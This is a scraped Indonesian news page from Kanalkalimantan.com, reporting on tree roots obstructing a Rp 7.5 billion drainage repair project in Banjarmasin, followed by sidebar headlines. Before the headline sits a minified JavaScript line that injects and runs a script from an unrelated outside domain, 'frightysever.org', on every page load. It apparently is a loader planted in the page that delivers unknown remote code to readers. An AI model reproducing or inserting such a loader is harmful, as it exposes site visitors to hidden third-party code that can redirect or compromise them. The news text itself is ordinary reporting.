(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Akar Pohon Jadi Masalah Drainase di Banjarmasin, Salah Potong Bisa Tumbang


KANALKALIMANTAN.COM, BANJARMASIN – Proyek perbaikan drainase di sejumlah lokasi di Kota Banjarmasin terkendala dengan banyaknya akar pohon yang menjulur di pinggir jalan.

Hal tersebut diungkapkan pengawas lapangan, Didit Siswandi mengatakan, selama ini yang menjadi kendala dirinya bersama pekerja lain adalah banyaknya akar pohon di beberapa titik lokasi perbaikan.

Dirinya mengungkapkan akar pohon yang banyak adalah di sekitar Jalan Kuripan yang menjadi titik lokasi perbaikan drainase. Didit bahkan mengatakan pernah kejadian pohon tumbang karena akarnya dipotong untuk perbaikan drainase.

“Kalau kami pernah kejadian, waktu kami lepas akarnya pohon itu tumbang,” katanya.

 

 

Baca juga: Gubernur Sahbirin Pastikan Kesiapan Venue MTQ XXIX di Kalsel

“Baru kemarin kita potong akhirnya tumbang, kan jadi masalah katanya merusak ekosistem, Kalau tidak kita kupas kita tidak bisa kerja,” tambah Didit.

Sementara itu, salah satu pekerja drainase di jalan Kuripan, Naji mengungkapkan, kesulitan dalam penggalian tanah karena adanya akar-akar pohon di sepanjang jalan Kuripan.

“Sangat mengganggu sebenarnya adanya akar itu, dan itu akan menggangu jalannya air. Kalau ada akar di sini mau tidak mau kita potong,” katanya, Kamis, (6/10/2022).

Pekerja sedang berusaha memotong akar pohon di Jalan Kuripan Banjarmasin. Foto: rizki

“Sudah ada dua yang roboh pohonnya di sana, tapi bukan dari pekerjaan kami,” tambah Naji sambil menunjuk lokasi lain yang tidak jauh dari tempat mereka bekerja.

Baca juga: Peluang Kerja di Luar Negeri, Jepang Tawarkan Perawat Lansia ke Pemprov Kalsel

Agar diketahui, proyek pengerjaan perbaikan drainase di kota Banjarmasin dianggarkan sekitar Rp 7,5 miliar dengan jarak sekitar 3 kilometer yang dananya bersumber dari APBD.

Proses pengerjaan drainase di Jalan Pahlawan Banjarmasin. Foto: rizki

Adapun titik-titik yang menjadi lokasi perbaikan yaitu Jalan Kuripan, Jalan Pahlawan, Jalan MT Haryono, Jalan Gunung Sari, Jalan Cempaka Sari, dan Jalan Banjar Indah.

Sementara itu, pihak terkait dari PUPR Kota Banjarmasin belum dapat ditemui saat dikonfirmasi Kanalkalimantan.com dan belum memberikan keterangan terkait permasalahan tersebut. (Kanalkalimantan.com/rizki)

 

Pekerja sedang berusaha memotong akar pohon di Jalan Kuripan Banjarmasin. Foto: rizki

Reporter : rizki
Editor : bie


Risa

Recent Posts

Berbaur dengan Masyarakat, Bupati dan Wabup Banjar Nobar Indonesia Vs Uzbekistan

KANALKALIMANTAN.COM, MARTAPURA - Alun-alun Ratu Zalecha, Martapura dipilih menjadi tempat nonton bareng (nobar) Semi Final… Read More

10 menit ago

Diakhiri Nobar Timnas, Pj Bupati Kapuas Menutup Expo Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi secara resmi menutup gelaran Expo… Read More

3 jam ago

Bingkisan Kebahagiaan PLN untuk Warga Kalsel yang Membutuhkan

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur (UIP3B) Kalimantan melalui… Read More

3 jam ago

Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024

KANALKALIMANTAN.COM, BANJARMASIN - Nonton bareng (Nobar) laga semifinal AFC U-23 Indonesia vs Uzbekistan di halaman… Read More

3 jam ago

Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS – Tiga rekor Museum Rekor Indonesia (Muri) menjadi catatan kado Hari Jadi… Read More

3 jam ago

Ritual Laluhan dan Ngarunya Lengkapi Perayaan HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Momen perayaan Hari Jadi ke-218 Kota Kuala Kapuas dan Hari Ulang… Read More

3 jam ago

This website uses cookies.